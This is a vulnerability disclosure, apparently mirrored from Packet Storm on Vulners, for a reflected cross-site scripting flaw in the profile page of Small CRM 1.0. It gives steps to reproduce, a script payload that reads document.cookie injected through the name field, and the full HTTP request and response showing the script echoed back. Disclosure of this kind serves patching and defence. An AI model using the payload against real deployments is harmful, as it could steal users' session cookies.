Vulners
Lucene search
Small CRM 1.0 Cross Site Scripting
🗓️ 06 Jun 2024 00:00:00Reported by Furkan Eren TetikType 
packetstorm🔗 packetstormsecurity.com👁 329 Views
`# Exploit Title: Small CRM Developed using PHP and MySQL - Cross-Site Scripting (Reflected)
# Date: 05.06.2024
# Exploit Author: Furkan Eren Tetik
# Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads
# Software Link: https://phpgurukul.com/small-crm-php
# Version: 1.0
# Tested on: Windows 11, Kali Linux
# Small CRM Developed System can be attacked with xss with a simple script
# https://www.linkedin.com/in/furkanerentetik/
Steps To Reproduce:
1 - Go to the login page http://localhost/crm/crm/profile.php
2 - Add new record payload= 'name='><script>alert(document.cookie)</script>'
3 - Enter on alert warning appears.
PoC
Request
POST /crm/crm/profile.php HTTP/1.1
Host: localhost
Content-Length: 674
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYFQBlbKN8Nl8KtgW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/crm/crm/profile.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: online_clinic_management_system=9fcs116dusfd3m2gjh88b8s777; PHPSESSID=1
Connection: close
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="name"
"><script>alert(document.cookie)</script>
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="alt_email"
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="phone"
0000000000
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="gender"
m
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="address"
deneme
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="update"
Update
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW--
----------------------------------------------------------------------------------------------
Response
HTTP/1.1 200 OK
Date: Tue, 04 Jun 2024 22:22:26 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13521
<script>alert('Your profile updated successfully.');</script>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta charset="utf-8" />
<title>CRM | User Profile</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta content="" name="description" />
<meta content="" name="author" />
<link href="assets/plugins/pace/pace-theme-flash.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/boostrapv3/css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/animate.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/jquery-scrollbar/jquery.scrollbar.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/style.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/responsive.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/>
</head>
<body class="">
<div class="header navbar navbar-inverse ">
<div class="navbar-inner">
<div class="header-seperation">
<ul class="nav pull-left notifcation-center" id="main-menu-toggle-wrapper" style="display:none">
<li class="dropdown"> <a id="main-menu-toggle" href="#main-menu" class="" >
<div class="iconset top-menu-toggle-white"></div>
</a> </li>
</ul>
<a href="dashboard.php" style="color:#FFF; font-size:24px; margin-top:20%;">CRM</a>
<ul class="nav pull-right notifcation-center">
<li class="dropdown" id="header_task_bar"> <a href="dashboard.php" class="dropdown-toggle active" data-toggle="">
<div class="iconset top-home"></div>
</a> </li>
</ul>
</div>
<div class="header-quick-nav" >
<div class="pull-left">
</div>
<div class="pull-right">
<ul class="nav quick-section ">
<li class="quicklinks"> <a data-toggle="dropdown" class="dropdown-toggle pull-right " href="#" id="user-options">
<div class="iconset top-settings-dark "></div>
</a>
<ul class="dropdown-menu pull-right" role="menu" aria-labelledby="user-options">
<li><a href="profile.php"> My Account</a> </li>
<li class="divider"></li>
<li><a href="logout.php"><i class="fa fa-power-off"></i> Log Out</a></li>
</ul>
</li>
</ul>
</div>
<!-- END CHAT TOGGLER -->
</div>
<!-- END TOP NAVIGATION MENU -->
</div>
<!-- END TOP NAVIGATION BAR -->
</div>
<!-- END HEADER --><div class="page-container row-fluid">
<!-- BEGIN SIDEBAR -->
<div class="page-sidebar" id="main-menu">
<!-- BEGIN MINI-PROFILE -->
<div class="page-sidebar-wrapper scrollbar-dynamic" id="main-menu-wrapper">
<div class="user-info-wrapper">
<div class="profile-wrapper"> <img src="assets/img/user.png" alt="" data-src="assets/img/user.png" data-src-retina="assets/img/user.png" width="69" height="69" /> </div>
<div class="user-info">
<div class="greeting" style="font-size:14px;">Welcome</div>
<div class="username" style="font-size:12px;">fet</div>
<div class="status" style="font-size:10px;"><a href="#">
<div class="status-icon green"></div>
Online</a></div>
</div>
</div>
<!-- END MINI-PROFILE -->
<!-- BEGIN SIDEBAR MENU -->
<p class="menu-title">BROWSE <span class="pull-right"><a href="javascript:;"><i class="fa fa-refresh"></i></a></span></p>
<ul>
<li class="start"> <a href="dashboard.php"> <i class="icon-custom-home"></i> <span class="title">Dashboard</span> <span class="selected"></span> </a>
</li>
<li><a href="change-password.php"><span class="fa fa-file-text-o"></span> Change Password</a></li>
<li><a href="profile.php"><span class="fa fa-user"></span> Profile</a></li>
<li ><a href="get-quote.php"> <span class="fa fa-tasks"></span> Request a Quote</a></li>
<li ><a href="create-ticket.php"><span class="fa fa-ticket"></span> Create Ticket</a></li>
<li ><a href="view-tickets.php"><span class="fa fa-ticket"></span> View Ticket</a></li>
</ul>
<div class="clearfix"></div>
</div>
</div>
<a href="#" class="scrollup">Scroll</a>
<div class="footer-widget">
<div class="progress transparent progress-small no-radius no-margin">
<div data-percentage="79%" class="progress-bar progress-bar-success animate-progress-bar" ></div>
</div>
<div class="pull-right">
</div>
</div>
<div class="page-content">
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<div class="page-title">
<h3>fet's Profile</h3>
<div class="row">
<div class="col-md-12">
<form class="form-horizontal" method="post" enctype="multipart/form-data">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title"><strong>Your Profile</h3>
<div align="right">
Registration Date :2024-06-05 01:16:29
</div>
</div>
<div class="panel-body">
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Name</label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="name" value=""><script>alert(1)</script>" class="form-control"/>
</div>
</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Primary Email </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="email" value="[email protected]" disabled="disabled" class="form-control"/>
</div>
</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">alternate Email </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="alt_email" value="" class="form-control"/>
</div>
</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Contact no </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="phone" value="0000000000" maxlength="10" class="form-control"/>
</div>
</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Gender </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<select class="form-control select" name="gender">
<option value="m">Male</option>
<option value="m">Male</option>
<option value="f">Female</option>
<option value="others">Other</option>
</select>
</select>
</div>
</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Address</label>
<div class="col-md-6 col-xs-12">
<textarea class="form-control" name="address" rows="5">"><script>alert(1)</script></textarea>
</div>
</div>
</div>
<div class="panel-footer">
<button class="btn btn-default" type="reset">Clear Form</button>
<input type="submit" value="Update" name="update" class="btn btn-primary pull-right">
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-scrollbar/jquery.scrollbar.min.js" type="text/javascript"></script>
<script src="assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="assets/js/core.js" type="text/javascript"></script>
<script src="assets/js/chat.js" type="text/javascript"></script>
<script src="assets/js/demo.js" type="text/javascript"></script>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Jun 2024 00:00Current
7.4High risk
Vulners AI Score7.4